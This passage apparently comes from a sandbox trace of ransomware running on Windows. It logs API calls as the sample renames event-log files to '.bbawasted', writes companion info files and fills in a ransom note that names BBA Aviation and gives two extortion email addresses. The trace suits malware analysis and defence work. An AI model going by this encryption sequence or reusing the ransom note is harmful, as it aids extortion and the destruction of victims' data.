KEY:\r\n[begin_key]rzEWLFDG2tQWekvEaMe4gwozneqBHqcaoeo6uRKphcwx7iaAEGratDoQBRFu1DXN\r\nLpNNOVUBfCnagn8aA6Xvs+XsBltWJcjDlF6h+S830WjpTs6E8ul0NHjCTTVuyAMp\r\nbVRKBcbWhODBPPCQmZ1osg9PiblWU6oVrkQX7ItZ6198mYeq8yn0F02bbetvw9O6\r\nf/G9z2Hk4mJWCuFc0ny3fUVRzy4j4yVZKOBlnDSk0HMGG55vgbFwFpKO3HfHlkvZ\r\nA6F280maFqDfr/iUATCzQDiUHV7xrWsv8fGCYIiPO6qFS2UF4ObA6GAe2ozqXGGA\r\nvTthcWTQYKoiJZJtsddI4ngapm82LB8HUoIV4EUZBHxOWwcDiYyRSrWfCOLe3WF9\r\n2OcAVuG6gxJpKI8jIrZFWBWnb2LqzAL9yaPAOTtLSUVnze9TMJOTMoIWvj7CeGlJ\r\ndVde4w3Yz9SPu6J3BzuuBcMk0C2Voy3pTVp0KmcyyPtu8WvgsbG4/ij68N/UrQMs\r\nyk59FyjIoDE8vyZ3DIIDFJA8a/IMXCs82Q5l37c+ZI+oWG7jVurvJAUspeW1/DwX\r\nCgvPTJURHk5XMmpe4bSbs4iJcSsdZAMrNrVmyDclWlnz/tqga37UVdnXoPiYZLG7\r\nNRMHKaNxqtkmOwnq6v7HO/Kfoa8tDhlC/wTRj9Pb17n=[end_key]\r\nKEEP IT\r\n") returned 984 [0191.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0191.594] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0191.594] SetEndOfFile (hFile=0x28c) returned 1 [0191.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.597] CloseHandle (hObject=0x28c) returned 1 [0191.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0191.600] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9938 | out: hHeap=0x660000) returned 1 [0191.600] _aulldvrm () returned 0x0 [0191.600] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0191.601] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0191.601] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0191.601] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 59 [0191.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6aecf0 [0191.601] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0191.601] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.601] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a68a0) returned 1 [0191.602] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0191.602] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0191.602] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0191.602] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0191.604] SetEndOfFile (hFile=0x28c) returned 1 [0191.604] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.604] lstrcpyW (in: lpString1=0x6aed66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0191.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.bbawasted")) returned 1 [0191.780] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0191.780] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0191.781] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0191.781] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0191.781] CloseHandle (hObject=0x294) returned 1 [0191.793] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0191.794] CloseHandle (hObject=0x280) returned 1 [0191.794] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0191.794] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a64e8) returned 1 [0191.795] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0191.795] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0191.795] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0191.796] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0191.796] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0191.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0191.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0191.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.805] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]E6+6NiTaauHpCdKgoFtDPKnFPlnEnAdNytpx2tbTuVZCJGUAz1T4KY3pu4BV5RdZ\r\nA9oSOl1y3sfKyE3WvR9JoQuRcaG11OV5Icue5dbZbcnFbmgbduLLcZPA/8bxPxiW\r\nXONkKIsR9XMffBIKnoTEb+HJhuwnwWvxUneC2VodYaeJBtEwHq7yXKer/jOruRP3\r\njbogWydcxu+6MNvVtpP8Ze4YcO4dr1eAMq5M69q0ja1UeEIDKPNS5mkIAHEMt83w\r\nA/t2AxdEx5IgCa9Nw6kK7QWyZaVwIcI2GojkZGIeRgPM7VWrioJR7bGw5XPqtjjv\r\n3el9WBJz5ZlL3A19YrYQwxThNjzyLFquqGCBpHFDWTY+CI8pnYXWZ83+Qao+40BP\r\nae8dnAEp2AuBWPx3mK9ndBhNTBFX8k/aXloB2OvGU1RwvZYhQAlhraTQRnl0Mo8G\r\nAtM2xA0jQkuoBLdR/HlpfJcPckSzYEey1dWrH1i+jZCZsvqJhmR8JLYJ/LFiO8/R\r\nWMl1ZaEsAfS4OLFN+9XCnrAZqpv64QeHy+lzQFffr7cyPAHo2iULooSc6SIY3faQ\r\nOG5nGHZ/EJQdj3vBG3hAxAiyLDgTXYxksnmb/cXL9Y0/F9Vj9xueJ6J5Gc4nBlxj\r\nSjqqV8js3OUQnVq0BRTQdB0og2Qx/BaPILKCvQCdplS=[end_key]\r\nKEEP IT\r\n") returned 984 [0191.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0191.806] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0191.806] SetEndOfFile (hFile=0x28c) returned 1 [0191.808] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.808] CloseHandle (hObject=0x28c) returned 1 [0191.930] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0191.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9a00 | out: hHeap=0x660000) returned 1 [0191.985] _aulldvrm () returned 0x0 [0191.985] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0191.985] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0191.985] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0191.985] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 60 [0191.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0191.986] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0191.986] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0191.986] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0191.986] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0191.986] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0191.986] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0191.987] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0191.990] SetEndOfFile (hFile=0x28c) returned 1 [0191.991] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0191.991] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0191.991] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.bbawasted")) returned 1 [0191.992] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0191.992] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0191.992] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0191.993] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0191.993] CloseHandle (hObject=0x280) returned 1 [0192.093] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0192.094] CloseHandle (hObject=0x294) returned 1 [0192.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0192.094] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0192.095] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0192.095] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0192.095] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0192.095] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0192.095] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0192.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0192.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0192.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.106] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]COocPQAaAOxZNOk0N//yjcLAeQmk+Raq0ewLzRpEOdFepdo8gfdM7m+FzMJOQ3+V\r\nAFTm91DqxeLIxZLvxytOQAIsnjxiKIa8TwTpjEjXstcfzsuuARZ4Ou3obuj8fD+L\r\ng/0dC/elK43F14WBkANqAHNw1ef421tswI2UbGsNQ+BxLBv/M+qYqBgcrYWY0fbA\r\nbwQI5Oy7jTbvrN/+R7E+du99xf8DFd5nuBxAIMVcQmXvzrJIwmvBbwctB70ERQm/\r\nHLK5gURgJtSWdk5AjTpEcdLYZoJNtLN9VS1toltYheir3r0yXvI6HbJvDXdTik0M\r\n7SrieOWrExEjrHdkc2NGa93NLjG2Bj+oyh+vBMFcQbcrx7hveR6hIrmDpbfrN7Hf\r\nDah0xUdJMCgcVyVRmW0Qq+SQCvFo5VaV3/audur9bQKm5SjF5/QkMhtI8cSemOiI\r\nvztuxm+fYdOSMXb47+s6dq/fKUD57nJJNvWx/MSNu+6vYeB5RYsL96gwKSwXEokC\r\nqQA7hUrbFnTATlkE1JAqWga1gDWPSUP4NF2ngz83fBfQd2LbCoQZtc3lXD57tkTW\r\nEnrxAxpREgNkMiKqkA5mrbzxlt7wg+7jNqABFtqCClh0/8fMGYlG/JzjryJIV/aD\r\n7F4olB/GQXKTu59xBY6PfFPR1A94nL9tayBJ4EkAWaI=[end_key]\r\nKEEP IT\r\n") returned 984 [0192.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0192.107] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0192.107] SetEndOfFile (hFile=0x28c) returned 1 [0192.235] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.235] CloseHandle (hObject=0x28c) returned 1 [0192.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0192.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7c78 | out: hHeap=0x660000) returned 1 [0192.240] _aulldvrm () returned 0x0 [0192.240] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0192.241] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0192.241] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0192.241] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 54 [0192.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0192.242] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0192.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.242] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a64e8) returned 1 [0192.242] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0192.242] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0192.242] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0192.243] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0192.245] SetEndOfFile (hFile=0x28c) returned 1 [0192.245] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.245] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.245] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0192.245] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.bbawasted")) returned 1 [0192.246] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0192.246] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0192.247] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0192.247] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0192.247] CloseHandle (hObject=0x294) returned 1 [0192.254] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0192.254] CloseHandle (hObject=0x280) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0192.255] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0192.255] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0192.255] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0192.255] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0192.256] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0192.256] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0192.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0192.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0192.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.268] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gzo+cfV2dKaR+K/z0oixXVE4xPtrOMUEQDfAcjJPGAlcUHvoRvy/VunjQVkS/TxM\r\nifx6j7xr4nfWx3kVIVXJLPYv2RkvmhZFSUJI1ajhul4OxFAeAJOYiMabsjPaQBrz\r\nqrKeZ0UJIYkscxN/iRPS33YfWIOG7O66/KMgioHyeDzABJq2UNu7/wT3jYur91IK\r\nhVFXiZxZIg+IjDq2vuixZapZ4/EibJbokGnNzy4qc1LTDQoklK0WLDs3y73FLGJ9\r\nCuw7DhZ3JtHIBdOEox+i1Zn1BN3aS0SGa5vGqbrkhPcExnU8HbiPMALbyiIp5XZx\r\nBB1EIX9G0Os/4mNtwqPJ7voCVUs2jjlVRyCKCZK7w23Pmaenkz1+JeaR3nNw4R35\r\nq/r3vZBgVSpzTF30LcRxN3du6jv1AGNHXLM2zIo0sy/G0RgxewGFj5cVOknuMf+l\r\n+0YzXP+jQ3L8JN/8+zS8jAryuo4vG5vn7ka/7bgDqXkfoiNGFxljVQmMIuXKnDge\r\n0jb13xtRX1wE8imloHmgrsDpTSuaVd3esitZe278CeaGDTNhdiZywVWdSmQwNMRJ\r\nhOfONlN0L7xKd95AYYbM2j1GZRkj5a6RNTNrEmlNw3yubg4qQvXU3z+5R6puvtvw\r\nOs9SaboGFqLRptEBGbO9dvFMO+qiwr+u9HR65QPjXPn=[end_key]\r\nKEEP IT\r\n") returned 984 [0192.268] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0192.268] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0192.269] SetEndOfFile (hFile=0x28c) returned 1 [0192.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0192.272] CloseHandle (hObject=0x28c) returned 1 [0192.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0192.276] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9ad0 | out: hHeap=0x660000) returned 1 [0192.276] _aulldvrm () returned 0x0 [0192.277] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a63d8) returned 1 [0192.277] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0192.277] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0192.277] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 45 [0192.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x264) returned 0x6aecf0 [0192.278] lstrcpyW (in: lpString1=0x6aed4a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0192.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0192.278] CryptAcquireContextW (in: phProv=0x147fea0, 